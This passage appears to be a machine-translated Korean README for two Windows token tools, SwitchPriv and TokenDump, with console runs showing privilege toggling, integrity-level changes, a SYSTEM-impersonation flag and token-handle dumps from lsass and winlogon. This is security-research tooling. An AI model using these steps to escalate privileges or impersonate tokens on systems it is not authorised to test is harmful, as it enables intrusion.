[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -d chan
[>] Trying to disable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
권한을 제거하려면 다음과 같이 --remove 옵션을 사용하십시오.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -r inc
[>] Trying to remove a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 4 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
특정 권한을 테스트하려면 -f 옵션으로 테스트하려는 것 이외의 모든 권한을 제거 할 수 있습니다.
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -f tim
[>] Trying to remove all token privileges except one.
[*] Target PID : 4392
[*] Process Name : powershell
[>] Trying to remove all privileges except for SeTimeZonePrivilege.
[+] SeShutdownPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 1 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
=================== =======
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
쉼표로 분리 된 값을 사용하여 다음과 같이 여러 권한을 필터링 할 수 있습니다.
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 24 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
[*] Integrity Level : High Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -f rest,back,deb
[>] Trying to remove all token privileges except one.
[*] Target PID : 24300
[*] Process Name : powershell
[>] Trying to remove privileges other than follows.
[*] SeBackupPrivilege
[*] SeRestorePrivilege
[*] SeDebugPrivilege
[+] SeIncreaseQuotaPrivilege is removed successfully.
[+] SeSecurityPrivilege is removed successfully.
[+] SeTakeOwnershipPrivilege is removed successfully.
[+] SeLoadDriverPrivilege is removed successfully.
[+] SeSystemProfilePrivilege is removed successfully.
[+] SeSystemtimePrivilege is removed successfully.
[+] SeProfileSingleProcessPrivilege is removed successfully.
[+] SeIncreaseBasePriorityPrivilege is removed successfully.
[+] SeCreatePagefilePrivilege is removed successfully.
[+] SeShutdownPrivilege is removed successfully.
[+] SeSystemEnvironmentPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeRemoteShutdownPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeManageVolumePrivilege is removed successfully.
[+] SeImpersonatePrivilege is removed successfully.
[+] SeCreateGlobalPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[+] SeTimeZonePrivilege is removed successfully.
[+] SeCreateSymbolicLinkPrivilege is removed successfully.
[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 3 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================= ========
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeDebugPrivilege Enabled
[*] Integrity Level : High Mandatory Level
[*] Done.
사용 가능한 모든 토큰 권한을 활성화, 비활성화 또는 제거하려면 all --enable , --disable 또는 --remove 옵션의 값으로 지정하십시오.
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:Dev> .SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 6772
[*] Process Name : powershell
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
프로세스를 찾으려면 특정 권한이 있으며 다음과 같이 -s 옵션을 사용합니다.
PS C:Dev> .SwitchPriv.exe -s createt
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] Memory Compression (PID : 2548)
[*] smss (PID : 372)
[*] lsass (PID : 736)
[*] csrss (PID : 584)
[*] csrss (PID : 504)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.
PS C:Dev> .SwitchPriv.exe -g -p 2548
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
무결성 레벨을 설정하려면 다음과 같이 --integrity 옵션을 사용하십시오.
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelMedium Mandatory Level Label S-1-16-8192
PS C:Dev> .SwitchPriv.exe -i 1
[>] Trying to update Integrity Level.
[*] Target PID : 3436
[*] Process Name : powershell
[>] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.
[+] Integrity Level is updated successfully.
[*] Done.
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelLow Mandatory Level Label S-1-16-4096
모든 작업을 시스템으로 수행하려면 다음과 같이 세트 -S 플래그 ( SeDebugPrivilege 및 SeImpersonatePrivilege 가 필요합니다) :
PS C:Dev> .SwitchPriv.exe -g -p 2548 -S
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
위로 돌아갑니다
프로젝트
이 도구는 토큰 정보를 검사하는 유틸리티입니다.
C:Dev>.TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
모든 프로세스에 대한 토큰을 열거하려면 -e 플래그를 설정하십시오.
C:Dev>.TokenDump.exe -e
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
--snip--
6712 0 svchost.exe NT AUTHORITYLOCAL SERVICE System False False
1972 0 svchost.exe NT AUTHORITYSYSTEM System False False
[+] Got 129 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
sedebugprivilege를 활성화하려면 다음과 같이 -d 플래그를 설정하십시오.
C:Dev>.TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
3740 0 vm3dservice.exe NT AUTHORITYSYSTEM System False False
--snip--
-e 플래그가있는 -H 플래그를 설정하면 Tokendump는 토큰 핸들 정보를 열거하려고합니다.
C:Dev>.TokenDump.exe -e -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 3272)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ========================== ========= ========== ============ ========== ===================
0x168 0 NT AUTHORITYLOCAL SERVICE System False False Primary Anonymous
[+] Got 819 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
-p 옵션이있는 PID를 지정할 때 Tokendup은 지정된 프로세스 핸들 만 열거합니다.
C:Dev>.TokenDump.exe -e -H -d -p 704
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
0x398 1 dev22h2user High False False Primary Identification
0x3C4 1 dev22h2user Medium False False Impersonation Impersonation
0x3C8 1 dev22h2user Medium False False Impersonation Impersonation
0x3D0 1 dev22h2user Medium False False Impersonation Impersonation
0x3D4 1 dev22h2user Medium False False Impersonation Impersonation
[+] Got 8 handle(s).
[*] Found 2 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Done.
가장과 같이 사망자 스레드 토큰을 열거하고 -T 플래그 -e 설정하십시오.
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
토큰 사용자 이름 으로이 결과를 필터링하려면 다음과 같이 필터 문자열을 -a 옵션 값으로 설정하십시오.
C:Dev>.TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= ============ ============================ ========= ========== ============
1932 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3500 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2904 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2504 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
7012 0 msdtc.exe NT AUTHORITYNETWORK SERVICE System False False
7092 0 sppsvc.exe NT AUTHORITYNETWORK SERVICE System False False
1676 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3584 0 WmiPrvSE.exe NT AUTHORITYNETWORK SERVICE System False False
1000 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
C:Dev>.TokenDump.exe -e -a network -d -H
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 768)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ============= ===================
0x914 0 NT AUTHORITYNETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - msdtc.exe (PID: 7012)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ========== ===================
0x23C 0 NT AUTHORITYNETWORK SERVICE System False False Primary Anonymous
[+] Got 27 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
특정 프로세스에 대한 장점 정보를 얻으려면 -s 플래그 및 대상 PID를 -p 옵션 값으로 설정하십시오.
C:Dev>.TokenDump.exe -s -p 5996
[>] Trying to dump process token information.
[Token Information for StartMenuExperienceHost.exe (PID: 5996)]
ImageFilePath : C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe
CommandLine : "C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x0000000000063D9A
Authentication ID : 0x000000000001DFE5
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000063D24
Integrity Level : Low
Protection Level : N/A
Session ID : 1
Elevation Type : Limited
Mandatory Policy : NoWriteUp
Elevated : False
AppContainer : True
TokenFlags : VirtualizeAllowed, IsFiltered, LowBox
AppContainer Name : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
AppContainer Number : 2
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group UseForDenyOnly
BUILTINAdministrators UseForDenyOnly
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelLow Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
========================================================================== =======
APPLICATION PACKAGE AUTHORITYYour Internet connection Enabled
APPLICATION PACKAGE AUTHORITYYour home or work networks Enabled
NAMED CAPABILITIESPackageQuery Enabled
NAMED CAPABILITIESActivitySystem Enabled
NAMED CAPABILITIESPreviewStore Enabled
NAMED CAPABILITIESCortanaPermissions Enabled
NAMED CAPABILITIESAppointmentsSystem Enabled
NAMED CAPABILITIESTeamEditionExperience Enabled
NAMED CAPABILITIESShellExperience Enabled
NAMED CAPABILITIESPackageContents Enabled
NAMED CAPABILITIESVisualElementsSystem Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
NAMED CAPABILITIESActivityData Enabled
NAMED CAPABILITIESCloudStore Enabled
NAMED CAPABILITIESTargetedContent Enabled
NAMED CAPABILITIESStoreAppInstall Enabled
NAMED CAPABILITIESStoreLicenseManagement Enabled
NAMED CAPABILITIESCortanaSettings Enabled
NAMED CAPABILITIESDependencyTarget Enabled
NAMED CAPABILITIESSearchSettings Enabled
NAMED CAPABILITIESCellularData Enabled
NAMED CAPABILITIESWifiData Enabled
PACKAGE CAPABILITYmicrosoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIESAccessoryManager Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
======================================================= =========================== ===== =============
dev22h2user GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : BUILTINAdministrators (SID: S-1-5-32-544)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x000000000016ECE6
Authentication ID : 0x000000000001DF83
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001DFE4
Integrity Level : High
Protection Level : N/A
Session ID : 1
Elevation Type : Full
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : NotLow
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelHigh Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTINAdministrators GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[*] Done.
특정 프로세스에서 -v 옵션으로 핸들 값을 설정하고 -s 플래그뿐만 아니라 -p 옵션으로 PID를 설정하면 다음과 같이 핸들에 대한 장황한 정보를 얻습니다.
C:Dev>.TokenDump.exe -s -p 7012 -v 0x23C -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]
Token User : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Owner : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Primary Group : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x000000000007DF17
Authentication ID : 0x00000000000003E4
Original ID : 0x00000000000003E7
Modified ID : 0x000000000007DEE2
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : False
AppContainer : False
TokenFlags : IsFiltered, NotLow
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= =========================
